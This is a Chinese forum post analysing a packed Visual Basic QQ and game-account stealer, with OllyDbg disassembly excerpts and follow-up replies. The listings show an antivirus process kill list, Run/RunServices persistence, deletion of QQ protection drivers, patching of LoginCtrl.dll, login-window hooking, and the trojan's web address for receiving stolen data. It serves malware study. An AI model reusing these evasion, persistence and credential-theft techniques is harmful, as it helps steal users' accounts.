某病毒分析(老大不知道发到哪个版好)
【破文标题】某病毒分析【破文作者】FoBnN
【作者邮箱】fobcrackgp163.com
【作者主页】www.hack58.com
【破解工具】OD+LOPE+xxxxxxxxxxxxx
【破解平台】XP+SP2
【软件名称】某盗号程序,现在偶也不知道是啥
【软件大小】48K
【原版下载】
【保护方式】NSPACK
【软件简介】无
【破解声明】MD鄙视挂马之人,也要感谢他,没他挂马也没偶这篇分析!
------------------------------------------------------------------------
起因:
今天在网上寻找些学习资料,无意中打开一个站,没多少时间发现进程数达到87个,!!!!狂汗!!!.
查看源代码后发现被挂了吗,利用GOLDSUN写的ADO缺陷。
迅速断网重启.先用QQKAV,RAV查了一遍,发现黑防鸽子和GSERVERVIP2006。还有几个盗号的软件。RAV监视服务无法
启动又发先BAIGOO。CND。超级影吧等流氓软件泛滥一一除之.打开QQ发现NSPROTECT启动失败,但并未出现红叉.大事不妙.
①.
打开TACKMGER,发现有两个SMSS.exe。其中一个是以偶当前用户身份运行,并非SYSTEM。很可疑
===================================================================================
发现其在%windir%下,于是CTRL+C复制发现复制不了,拿出UE打开,然后保存.终于复制下来,结束进程。删除文件.
用PEID查看
看到区段为XXX1,XXX2,XXX3判断为NSPACK
===================================================================================
OD,esp定律,DUMP,修复,文件48K变为264K
00403644 >68 6C394000 push dumped_.0040396C ;OEP
00403649 E8 F0FFFFFF call <jmp.&msvbvm50.ThunRTMain>
0040364E 0000 add byte ptr ds:,al
00403650 0000 add byte ptr ds:,al
00403652 0000 add byte ptr ds:,al
00403654 3000 xor byte ptr ds:,al
00403656 0000 add byte ptr ds:,al
====================================================================================
②.因为发现是VB编写的程序,用GetVBRes载入分析资源,看看有没有关键信息.
晕死查看一下发现不少.如图1,图2,
http://bbs.hack58.com/attachment/Fid_39/39_1755_3dfa7340570d490.jpg
http://bbs.hack58.com/attachment/Fid_39/39_1755_3aa4fdbd0364f8e.jpg
====================================================================================
③用OD分析吧
00413567 E8 28FFFEFF call <jmp.&msvbvm50.rtcMsgBox> ;运行时这里会弹出迷惑性的提示
00414A3E /74 05 je short dumped_.00414A45
00414A40 |E9 552A0000 jmp dumped_.0041749A
00414A45 \C745 FC 0A00000>mov dword ptr ss:,0A
00414A4C E8 092F0000 call dumped_.0041795A ;这个CALL对杀软进行检测破坏
-----------
0041795A 55 push ebp
0041795B 8BEC mov ebp,esp
0041795D 83EC 18 sub esp,18
00417960 68 06324000 push <jmp.&msvbvm50.__vbaExceptHandler>
00417965 64:A1 00000000mov eax,dword ptr fs:
0041796B 50 push eax
0041796C 64:8925 0000000>mov dword ptr fs:,esp
00417973 B8 38050000 mov eax,538
00417978 E8 83B8FEFF call <jmp.&msvbvm50.__vbaChkstk>
0041797D 53 push ebx
0041797E 56 push esi
0041797F 57 push edi
00417980 8965 E8 mov dword ptr ss:,esp
00417983 C745 EC C01C400>mov dword ptr ss:,dumped_.00401CC0
0041798A 8365 F0 00 and dword ptr ss:,0
0041798E 8365 F4 00 and dword ptr ss:,0
00417992 C745 FC 0100000>mov dword ptr ss:,1
00417999 C745 FC 0200000>mov dword ptr ss:,2
004179A0 6A FF push -1
004179A2 E8 81BAFEFF call <jmp.&msvbvm50.__vbaOnError>
004179A7 C745 FC 0300000>mov dword ptr ss:,3
004179AE 6A 00 push 0
004179B0 6A 02 push 2
004179B2 E8 49DBFEFF call dumped_.00405500
004179B7 8985 54FDFFFF mov dword ptr ss:,eax
004179BD E8 0CBAFEFF call <jmp.&msvbvm50.__vbaSetSystemError>
004179C2 8B85 54FDFFFF mov eax,dword ptr ss:
004179C8 8945 D8 mov dword ptr ss:,eax
004179CB C745 FC 0400000>mov dword ptr ss:,4
004179D2 C785 A4FDFFFF 2>mov dword ptr ss:,128
004179DC C745 FC 0500000>mov dword ptr ss:,5
004179E3 8D85 A4FDFFFF lea eax,dword ptr ss:
004179E9 50 push eax
004179EA 8D85 28FCFFFF lea eax,dword ptr ss:
004179F0 50 push eax
004179F1 68 48534000 push dumped_.00405348
004179F6 E8 1DBBFEFF call <jmp.&msvbvm50.__vbaRecUniToAnsi>
004179FB 50 push eax
004179FC FF75 D8 push dword ptr ss:
004179FF E8 3CDBFEFF call dumped_.00405540
00417A04 8985 54FDFFFF mov dword ptr ss:,eax
00417A0A E8 BFB9FEFF call <jmp.&msvbvm50.__vbaSetSystemError>
00417A0F 8D85 28FCFFFF lea eax,dword ptr ss:
00417A15 50 push eax
00417A16 8D85 A4FDFFFF lea eax,dword ptr ss:
00417A1C 50 push eax
00417A1D 68 48534000 push dumped_.00405348
00417A22 E8 EBBAFEFF call <jmp.&msvbvm50.__vbaRecAnsiToUni>
00417A27 83BD 54FDFFFF 0>cmp dword ptr ss:,0
00417A2E 0F84 EE130000 je dumped_.00418E22
00417A34 C745 FC 0700000>mov dword ptr ss:,7
00417A3B 66:83A5 58FDFFF>and word ptr ss:,0
00417A43 8D85 58FDFFFF lea eax,dword ptr ss:
00417A49 50 push eax
00417A4A 8D85 C8FDFFFF lea eax,dword ptr ss:
00417A50 50 push eax
00417A51 68 04010000 push 104
00417A56 E8 79B9FEFF call <jmp.&msvbvm50.__vbaStrFixstr>
00417A5B 8BD0 mov edx,eax
00417A5D 8D8D A0FDFFFF lea ecx,dword ptr ss:
00417A63 E8 96B9FEFF call <jmp.&msvbvm50.__vbaStrMove>
00417A68 50 push eax
00417A69 E8 6591FFFF call dumped_.00410BD3
00417A6E 8BD0 mov edx,eax
00417A70 8D8D 9CFDFFFF lea ecx,dword ptr ss:
00417A76 E8 83B9FEFF call <jmp.&msvbvm50.__vbaStrMove>
00417A7B FFB5 A0FDFFFF push dword ptr ss:
00417A81 8D85 C8FDFFFF lea eax,dword ptr ss:
00417A87 50 push eax
00417A88 68 04010000 push 104
00417A8D E8 36B9FEFF call <jmp.&msvbvm50.__vbaLsetFixstr>
00417A92 8B85 9CFDFFFF mov eax,dword ptr ss:
00417A98 8985 E8FAFFFF mov dword ptr ss:,eax
00417A9E 83A5 9CFDFFFF 0>and dword ptr ss:,0
00417AA5 8B85 E8FAFFFF mov eax,dword ptr ss:
00417AAB 8985 94FDFFFF mov dword ptr ss:,eax
00417AB1 C785 8CFDFFFF 0>mov dword ptr ss:,8
00417ABB 8D85 8CFDFFFF lea eax,dword ptr ss:
00417AC1 50 push eax
00417AC2 8D85 7CFDFFFF lea eax,dword ptr ss:
00417AC8 50 push eax
00417AC9 E8 A0B8FEFF call <jmp.&msvbvm50.rtcUpperCaseVar>
00417ACE C785 64FDFFFF 7>mov dword ptr ss:,dumped_.00408974 ; UNICODE "RAVMON.EXE" ;瑞星
00417BF5 C785 64FDFFFF 9>mov dword ptr ss:,dumped_.00408990 ; UNICODE "TROJDIE*"
00417D1C C785 64FDFFFF A>mov dword ptr ss:,dumped_.004089A8 ; UNICODE "KPOP*"
00417E43 C785 64FDFFFF B>mov dword ptr ss:,dumped_.004089B8 ; UNICODE "CCENTER*"
00417F6A C785 64FDFFFF D>mov dword ptr ss:,dumped_.004089D0 ; UNICODE "*ASSISTSE*"
00418084 C785 64FDFFFF E>mov dword ptr ss:,dumped_.004089EC ; UNICODE "KPFW*"
004181AB C785 64FDFFFF F>mov dword ptr ss:,dumped_.004089FC ; UNICODE "AGENTSVR*"
004182D2 C785 64FDFFFF 1>mov dword ptr ss:,dumped_.00408A14 ; UNICODE "KV*" ;还有很多,一些强的都在了
=======================================================================================
004168F1 68 90864000 push dumped_.00408690 ; UNICODE "SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\Runservices"
004169D9 68 78864000 push dumped_.00408678 ; UNICODE "TProgram"
............................................................服务启动
00416666 /74 4A je short dumped_.004166B2
00416668 |C745 FC 6E00000>mov dword ptr ss:,6E
0041666F |6A 0E push 0E
00416671 |68 F4854000 push dumped_.004085F4 ; UNICODE "Explorer.exe 1"
00416676 |8D45 B4 lea eax,dword ptr ss:
00416679 |50 push eax
0041667A |E8 5BCDFEFF call <jmp.&msvbvm50.__vbaStrToAnsi>
0041667F |50 push eax
00416680 |6A 01 push 1
00416682 |6A 00 push 0
00416684 |68 E4854000 push dumped_.004085E4 ; UNICODE "Shell"
00416689 |8D45 B8 lea eax,dword ptr ss:
0041668C |50 push eax
0041668D |E8 48CDFEFF call <jmp.&msvbvm50.__vbaStrToAnsi>
00416692 |50 push eax
00416693 |FF75 CC push dword ptr ss:
00416696 |E8 FDF1FEFF call dumped_.00405898
0041669B |E8 2ECDFEFF call <jmp.&msvbvm50.__vbaSetSystemError>
004166A0 |8D45 B4 lea eax,dword ptr ss:
004166A3 |50 push eax
004166A4 |8D45 B8 lea eax,dword ptr ss:
004166A7 |50 push eax
004166A8 |6A 02 push 2
004166AA |E8 37CDFEFF call <jmp.&msvbvm50.__vbaFreeStrList>
004166AF |83C4 0C add esp,0C
004166B2 \C745 FC 7000000>mov dword ptr ss:,70
004166B9 8D45 CC lea eax,dword ptr ss:
004166BC 50 push eax
004166BD 68 18864000 push dumped_.00408618 ; UNICODE "SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN"
004166C2 8D45 B8 lea eax,dword ptr ss:
004166C5 50 push eax
004166C6 E8 0FCDFEFF call <jmp.&msvbvm50.__vbaStrToAnsi>
004166CB 50 push eax
004166CC 68 02000080 push 80000002
004166D1 E8 FEF0FEFF call dumped_.004057D4
004166D6 8985 18FFFFFF mov dword ptr ss:,eax
004166DC E8 EDCCFEFF call <jmp.&msvbvm50.__vbaSetSystemError>
004166E1 33C0 xor eax,eax
004166E3 83BD 18FFFFFF 0>cmp dword ptr ss:,0
004166EA 0F94C0 sete al
004166ED F7D8 neg eax
004166EF 66:8985 0CFFFFF>mov word ptr ss:,ax
004166F6 8D4D B8 lea ecx,dword ptr ss:
004166F9 E8 06CDFEFF call <jmp.&msvbvm50.__vbaFreeStr>
004166FE 0FBF85 0CFFFFFF movsx eax,word ptr ss:
00416705 85C0 test eax,eax
00416707 0F84 D9010000 je dumped_.004168E6
0041670D C745 FC 7100000>mov dword ptr ss:,71
00416714 C785 58FFFFFF E>mov dword ptr ss:,dumped_.004062E4
0041671E C785 50FFFFFF 0>mov dword ptr ss:,8
00416728 8D95 50FFFFFF lea edx,dword ptr ss:
0041672E 8D4D 90 lea ecx,dword ptr ss:
00416731 E8 CCCBFEFF call <jmp.&msvbvm50.__vbaVarDup>
00416736 8D45 90 lea eax,dword ptr ss:
00416739 50 push eax
0041673A 68 2C010000 push 12C
0041673F 8D45 80 lea eax,dword ptr ss:
00416742 50 push eax
00416743 E8 AECBFEFF call <jmp.&msvbvm50.rtcStringVar>
00416748 8D45 80 lea eax,dword ptr ss:
0041674B 50 push eax
0041674C E8 35CCFEFF call <jmp.&msvbvm50.__vbaStrVarMove>
00416751 8BD0 mov edx,eax
00416753 8D4D D0 lea ecx,dword ptr ss:
00416756 E8 A3CCFEFF call <jmp.&msvbvm50.__vbaStrMove>
0041675B 8D45 80 lea eax,dword ptr ss:
0041675E 50 push eax
0041675F 8D45 90 lea eax,dword ptr ss:
00416762 50 push eax
00416763 6A 02 push 2
00416765 E8 0ACCFEFF call <jmp.&msvbvm50.__vbaFreeVarList>
0041676A 83C4 0C add esp,0C
0041676D C745 FC 7200000>mov dword ptr ss:,72
00416774 C785 14FFFFFF 2>mov dword ptr ss:,12C
0041677E C785 18FFFFFF 0>mov dword ptr ss:,1
00416788 8D85 14FFFFFF lea eax,dword ptr ss:
0041678E 50 push eax
0041678F FF75 D0 push dword ptr ss:
00416792 8D45 B4 lea eax,dword ptr ss:
00416795 50 push eax
00416796 E8 3FCCFEFF call <jmp.&msvbvm50.__vbaStrToAnsi>
0041679B 50 push eax
0041679C 8D85 18FFFFFF lea eax,dword ptr ss:
004167A2 50 push eax
004167A3 6A 00 push 0
004167A5 68 78864000 push dumped_.00408678 ; UNICODE "TProgram"
004167AA 8D45 B8 lea eax,dword ptr ss:
004167AD 50 push eax
004167AE E8 27CCFEFF call <jmp.&msvbvm50.__vbaStrToAnsi>
004167B3 50 push eax
004167B4 FF75 CC push dword ptr ss:
004167B7 E8 9CF0FEFF call dumped_.00405858
004167BC 8985 10FFFFFF mov dword ptr ss:,eax
004167C2 E8 07CCFEFF call <jmp.&msvbvm50.__vbaSetSystemError>
004167C7 FF75 B4 push dword ptr ss:
004167CA 8D45 D0 lea eax,dword ptr ss:
004167CD 50 push eax
004167CE E8 EFCBFEFF call <jmp.&msvbvm50.__vbaStrToUnicode>
004167D3 33C0 xor eax,eax
004167D5 83BD 10FFFFFF 0>cmp dword ptr ss:,0
004167DC 0F95C0 setne al
004167DF F7D8 neg eax
004167E1 66:8985 0CFFFFF>mov word ptr ss:,ax
004167E8 8D45 B4 lea eax,dword ptr ss:
004167EB 50 push eax
004167EC 8D45 B8 lea eax,dword ptr ss:
004167EF 50 push eax
004167F0 6A 02 push 2
004167F2 E8 EFCBFEFF call <jmp.&msvbvm50.__vbaFreeStrList>
004167F7 83C4 0C add esp,0C
004167FA 0FBF85 0CFFFFFF movsx eax,word ptr ss:
00416801 85C0 test eax,eax
00416803 0F84 DD000000 je dumped_.004168E6
00416809 C745 FC 7300000>mov dword ptr ss:,73
00416810 E8 072F0000 call dumped_.0041971C
00416815 8BD0 mov edx,eax
00416817 8D4D A0 lea ecx,dword ptr ss:
0041681A E8 DFCBFEFF call <jmp.&msvbvm50.__vbaStrMove>
0041681F 8B45 A0 mov eax,dword ptr ss:
00416822 8985 ECFEFFFF mov dword ptr ss:,eax
00416828 8365 A0 00 and dword ptr ss:,0
0041682C E8 EB2E0000 call dumped_.0041971C
00416831 8BD0 mov edx,eax
00416833 8D4D B4 lea ecx,dword ptr ss:
00416836 E8 C3CBFEFF call <jmp.&msvbvm50.__vbaStrMove>
0041683B 50 push eax
0041683C 68 08794000 push dumped_.00407908 ; UNICODE "\SMSS.EXE"
00416841 E8 9ACBFEFF call <jmp.&msvbvm50.__vbaStrCat>
00416846 8BD0 mov edx,eax
00416848 8D4D B0 lea ecx,dword ptr ss:
0041684B E8 AECBFEFF call <jmp.&msvbvm50.__vbaStrMove>
00416850 50 push eax
00416851 E8 9CCBFEFF call <jmp.&msvbvm50.__vbaLenBstr>
00416856 50 push eax
00416857 8B95 ECFEFFFF mov edx,dword ptr ss:
0041685D 8D4D B8 lea ecx,dword ptr ss:
00416860 E8 99CBFEFF call <jmp.&msvbvm50.__vbaStrMove>
00416865 50 push eax
00416866 68 08794000 push dumped_.00407908 ; UNICODE "\SMSS.EXE" 关联EXPLORER
00416A70 68 08794000 push dumped_.00407908 ; UNICODE "\SMSS.EXE"
盗号之QQ篇.
004280EC 55 push ebp
004280ED 8BEC mov ebp,esp
004280EF 83EC 18 sub esp,18
004280F2 68 06324000 push <jmp.&msvbvm50.__vbaExceptHandler>
004280F7 64:A1 00000000mov eax,dword ptr fs:
004280FD 50 push eax
004280FE 64:8925 0000000>mov dword ptr fs:,esp
00428105 B8 C4000000 mov eax,0C4
0042810A E8 F1B0FDFF call <jmp.&msvbvm50.__vbaChkstk>
0042810F 53 push ebx
00428110 56 push esi
00428111 57 push edi
00428112 8965 E8 mov dword ptr ss:,esp
00428115 C745 EC 382C400>mov dword ptr ss:,dumped_.00402C38
0042811C 8365 F0 00 and dword ptr ss:,0
00428120 8365 F4 00 and dword ptr ss:,0
00428124 C745 FC 0100000>mov dword ptr ss:,1
0042812B 8B55 08 mov edx,dword ptr ss:
0042812E 8D4D D4 lea ecx,dword ptr ss:
00428131 E8 D4B2FDFF call <jmp.&msvbvm50.__vbaStrCopy>
00428136 68 649F4000 push dumped_.00409F64
0042813B 8D45 B4 lea eax,dword ptr ss:
0042813E 50 push eax
0042813F E8 A0B1FDFF call <jmp.&msvbvm50.__vbaAryConstruct>
00428144 C745 FC 0200000>mov dword ptr ss:,2
0042814B 6A FF push -1
0042814D E8 D6B2FDFF call <jmp.&msvbvm50.__vbaOnError>
00428152 C745 FC 0300000>mov dword ptr ss:,3
00428159 68 DC9E4000 push dumped_.00409EDC ; UNICODE "0000010001000C0C000001000800E804"
0042815E E8 8690FEFF call dumped_.004111E9
00428163 8BD0 mov edx,eax
00428165 8D4D AC lea ecx,dword ptr ss:
00428168 E8 91B2FDFF call <jmp.&msvbvm50.__vbaStrMove>
0042816D C745 FC 0400000>mov dword ptr ss:,4
00428174 FF75 D4 push dword ptr ss:
00428177 68 249F4000 push dumped_.00409F24 ; UNICODE "\qqpnpp.sys" 弹出"qqpnpp.sys"
0042817C E8 5FB2FDFF call <jmp.&msvbvm50.__vbaStrCat> ;挑到到QQ安装目录
00428181 8945 94 mov dword ptr ss:,eax
00428184 C745 8C 0800000>mov dword ptr ss:,8
0042818B 8D45 8C lea eax,dword ptr ss:
0042818E 50 push eax
0042818F E8 F4B2FDFF call <jmp.&msvbvm50.rtcKillFiles> ;删除文件
00428194 8D4D 8C lea ecx,dword ptr ss:
00428197 E8 F6B1FDFF call <jmp.&msvbvm50.__vbaFreeVar>
0042819C C745 FC 0500000>mov dword ptr ss:,5
004281A3 E8 7AB2FDFF call <jmp.&msvbvm50.rtcDoEvents> ;循环
004281A8 C745 FC 0600000>mov dword ptr ss:,6
004281AF FF75 D4 push dword ptr ss:
004281B2 68 389E4000 push dumped_.00409E38 ; UNICODE "\npkcrypt.vxd"弹出"npkcrypt.vxd"
004281B7 E8 24B2FDFF call <jmp.&msvbvm50.__vbaStrCat> ;挑到到QQ安装目录
004281BC 8BD0 mov edx,eax
004281BE 8D4D A0 lea ecx,dword ptr ss:
004281C1 E8 38B2FDFF call <jmp.&msvbvm50.__vbaStrMove>
004281C6 50 push eax
004281C7 E8 F4B2FDFF call <jmp.&msvbvm50.rtcKillFiles> ;删除文件
--------------------------------------------------------------------------------------
0042832A 8D45 9C lea eax,dword ptr ss:
0042832D 50 push eax
0042832E E8 E3B0FDFF call <jmp.&msvbvm50.__vbaObjSet>
00428333 8985 24FFFFFF mov dword ptr ss:,eax
00428339 8B85 24FFFFFF mov eax,dword ptr ss:
0042833F 8B00 mov eax,dword ptr ds:
00428341 FFB5 24FFFFFF push dword ptr ss:
00428347 FF50 48 call dword ptr ds:
0042834A 8D4D 9C lea ecx,dword ptr ss:
0042834D E8 BEB0FDFF call <jmp.&msvbvm50.__vbaFreeObj>
00428352 C745 FC 0D00000>mov dword ptr ss:,0D
00428359 FF75 D4 push dword ptr ss:
0042835C 68 409F4000 push dumped_.00409F40 ; UNICODE "\LoginCtrl.dll"
00428361 E8 7AB0FDFF call <jmp.&msvbvm50.__vbaStrCat>
00428366 8BD0 mov edx,eax
00428368 8D4D A4 lea ecx,dword ptr ss:
0042836B E8 8EB0FDFF call <jmp.&msvbvm50.__vbaStrMove>
00428370 50 push eax
00428371 6A 21 push 21
00428373 6A FF push -1
00428375 68 20100000 push 1020
0042837A E8 EBB0FDFF call <jmp.&msvbvm50.__vbaFileOpen> ;打开文件
0042837F 8D4D A4 lea ecx,dword ptr ss:
00428382 E8 7DB0FDFF call <jmp.&msvbvm50.__vbaFreeStr>
00428387 C745 FC 0E00000>mov dword ptr ss:,0E
0042838E E8 8FB0FDFF call <jmp.&msvbvm50.rtcDoEvents> ;交给系统
00428393 C745 FC 0F00000>mov dword ptr ss:,0F
0042839A C745 94 0400028>mov dword ptr ss:,80020004
004283A1 C745 8C 0A00000>mov dword ptr ss:,0A
004283A8 8D45 8C lea eax,dword ptr ss:
004283AB 50 push eax
004283AC E8 69AFFDFF call <jmp.&msvbvm50.rtcRandomize>
004283B1 8D4D 8C lea ecx,dword ptr ss:
004283B4 E8 D9AFFDFF call <jmp.&msvbvm50.__vbaFreeVar>
004283B9^ E9 C9FEFFFF jmp dumped_.00428287
004283BE C745 FC 1100000>mov dword ptr ss:,11
004283C5 C645 B0 01 mov byte ptr ss:,1
004283C9 C745 FC 1200000>mov dword ptr ss:,12
004283D0 6A 21 push 21
004283D2 E8 7DB1FDFF call <jmp.&msvbvm50.rtcFileLength> ;读取文件长度
004283D7 8985 44FFFFFF mov dword ptr ss:,eax
004283DD C785 48FFFFFF 0>mov dword ptr ss:,1000
004283E7 C745 DC 0000010>mov dword ptr ss:,10000 ; UNICODE "=::=::\"比较
004283EE EB 0C jmp short dumped_.004283FC
004283F0 8B45 DC mov eax,dword ptr ss:
004283F3 0385 48FFFFFF add eax,dword ptr ss:
004283F9 8945 DC mov dword ptr ss:,eax
004283FC 8B45 DC mov eax,dword ptr ss:
004283FF 3B85 44FFFFFF cmp eax,dword ptr ss: 上面对LoginCtrl.dll进行修改,不出现红插
=============================================================================
00427E93 /0F84 95000000 je dumped_.00427F2E
00427E99 |8D45 08 lea eax,dword ptr ss:
00427E9C |50 push eax
00427E9D |E8 C5000000 call dumped_.00427F67
00427EA2 |8BD0 mov edx,eax
00427EA4 |8D4D D8 lea ecx,dword ptr ss:
00427EA7 |E8 52B5FDFF call <jmp.&msvbvm50.__vbaStrMove>
00427EAC |FF75 D8 push dword ptr ss:
00427EAF |68 CC9E4000 push dumped_.00409ECC ; UNICODE "Edit" ;QQ登入框上的控件
00427EB4 |E8 03B5FDFF call <jmp.&msvbvm50.__vbaStrCmp> ;比较
00427EB9 |85C0 test eax,eax
00427EBB |75 76 jnz short dumped_.00427F33
00427EBD |FF75 08 push dword ptr ss:
00427EC0 |E8 B3EAFDFF call dumped_.00406978
00427EC5 |8BF0 mov esi,eax
00427EC7 |E8 02B5FDFF call <jmp.&msvbvm50.__vbaSetSystemError>
00427ECC |8D45 CC lea eax,dword ptr ss:
00427ECF |50 push eax
00427ED0 |8975 CC mov dword ptr ss:,esi
00427ED3 |E8 8F000000 call dumped_.00427F67
00427ED8 |8BD0 mov edx,eax
00427EDA |8D4D D4 lea ecx,dword ptr ss:
00427EDD |E8 1CB5FDFF call <jmp.&msvbvm50.__vbaStrMove>
00427EE2 |50 push eax
00427EE3 |68 60674000 push dumped_.00406760 ; UNICODE "#32770" ;QQ登入框
00427EE8 |E8 CFB4FDFF call <jmp.&msvbvm50.__vbaStrCmp> ;比较
==========================================================================
太累了就先暂停到这里,
发现程序还可以盗WOW,梦友,联众.并且有个黑名单,杀软都在里面。用服务启动,在注册表也有藏匿。关联EXPLORER.
对WOW,梦幻等升级程序进行破解,让它不能升级.
------------------------------------------------------------------------
还是第一次看到这样的盗号软件,用VB写的这么多功能.
------------------------------------------------------------------------
【版权声明】BY FoBnN qq:380838221 又发现程序复制自身到
%windir%
副本
ExERoute.exe
1.com
explorer.com
finder.com
WEB接收地址为qq.etsoft.com.cn/QQ38/postdata.asp? 原帖由 fobnn 于 2006-8-8 15:46 发表
又发现程序复制自身到
%windir%
副本
ExERoute.exe
1.com
explorer.com
finder.com
WEB接收地址为qq.etsoft.com.cn/QQ38/postdata.asp?
我晕~兄弟们都搞到病毒的身上了~支持反毒一族。 高手。。。。。。。 病毒?太厉害了,偶连碰都不敢碰 原帖由 fobnn 于 2006-8-8 15:07 发表
【破文标题】某病毒分析
【破文作者】FoBnN
【作者邮箱】fobcrackgp163.com
【作者主页】www.hack58.com
【破解工具】OD+LOPE+xxxxxxxxxxxxx
【破解平台】XP+SP2
【软件名称】某盗号程序,现在偶也不知道是啥 ...
汗,这个功能是又蛮多了,我以前写的一个只有60%的功能,后来硬盘挂了,之后就Game Over了,背时~~~
页:
[1]